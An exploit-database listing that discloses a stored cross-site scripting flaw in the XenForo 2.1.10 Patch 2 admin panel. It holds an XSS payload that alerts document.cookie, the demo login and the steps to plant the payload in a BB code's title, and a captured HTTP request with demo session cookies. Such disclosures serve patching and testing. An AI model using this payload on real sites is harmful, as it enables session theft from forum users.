Exploit for XenForo 2.1.10 Patch 2 Cross Site Scripting

Name: Exploit for XenForo 2.1.10 Patch 2 Cross Site Scripting
Rating: 5 (176 reviews)
2020-08-17 | CVSS -0.2
## https://sploitus.com/exploit?id=PACKETSTORM:158883
# Exploit Title: XenForo v2.1.10 Patch 2 Stored XSS  
# Date:16.08.2020  
# Author: Vincent666 ibn Winnie  
# Software Link: https://xenforo.com/demo/  
# Tested on: Windows 10  
# Web Browser: Mozilla Firefox  
# Blog :https://pentest-vincent.blogspot.com/  
# PoC :https://pentest-vincent.blogspot.com/2020/08/xenforo-v2110-patch-2-stored-xss.html  
  
PoC:  
  
I use demo XenForo Admin panel for test.  
Create demo site:  
https://xenforo.com/demo/  
Login:admin  
Password:admin  
Go to the Admin panel -> open Content-> bb codes->Add bb code  
  
Put xss code in field "Title" or "Description" or other and save this.  
  
Xss code:  
  
"""><script>alert(document.cookie)</script><script>alert("Stored XSS  
XenForo")</script>  
  
We have a stored xss.  
  
Picture:  
  
https://imgur.com/a/sfE6DwZ  
  
Video:  
  
https://www.youtube.com/watch?v=eIJwP0Y1luQ&feature=youtu.be  
  
https://27ff066882409b73.demo-xenforo.com/2110p2/admin.php?bb-codes/save  
Host: 27ff066882409b73.demo-xenforo.com  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:70.0)  
Gecko/20100101 Firefox/70.0  
Accept: application/json, text/javascript, */*; q=0.01  
Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate, br  
Referer: https://27ff066882409b73.demo-xenforo.com/2110p2/admin.php?bb-codes/add  
X-Requested-With: XMLHttpRequest  
Content-Type: multipart/form-data;  
boundary=---------------------------3006497114009  
Content-Length: 2530  
Origin: https://27ff066882409b73.demo-xenforo.com  
Connection: keep-alive  
Cookie: 2110p2_csrf=R0-3YLvAUaqs1EVL;  
2110p2_user=1%2CK6XXrhPx4KhqByRM3saOr3gOzYJ0_-8cA-qKDEcw;  
2110p2_session=m0BX5XYtnGIc5HogKPEcY2jwdZrOd95u;  
2110p2_session_admin=bru_eXQSO-jIXtAaESSJDoD69BLcIiVd  
bb_code_id=test&title=""><script>alert("Stored XSS  
XenForo")</script>&desc=&bb_code_mode=replace&has_option=no&replace_html=&callback_class=&callback_method=&editor_icon_type=&example=&output=&allow_signature=1&active=1&addon_id=&option_regex=&trim_lines_after=0&replace_html_email=&replace_text=&_xfToken=1597585880,aa740358187e6579a880755adc20d9ba,1597585880,aa740358187e6579a880755adc20d9ba&_xfRequestUri=/2110p2/admin.php?bb-codes/add&_xfWithData=1&_xfResponseType=json  
POST: HTTP/1.1 200 OK  
  
Date: Sun, 16 Aug 2020 13:51:29 GMT  
Server: Apache/2.2.15 (CentOS)  
X-Powered-By: PHP/7.2.12  
X-Frame-Options: SAMEORIGIN  
X-Content-Type-Options: nosniff  
Last-Modified: Sun, 16 Aug 2020 13:51:29 GMT  
Expires: Thu, 19 Nov 1981 08:52:00 GMT  
Cache-Control: private, no-cache, max-age=0  
Content-Encoding: gzip  
Vary: Accept-Encoding  
Content-Length: 254  
Keep-Alive: timeout=2, max=100  
Connection: Keep-Alive  
Content-Type: application/json; charset=utf-8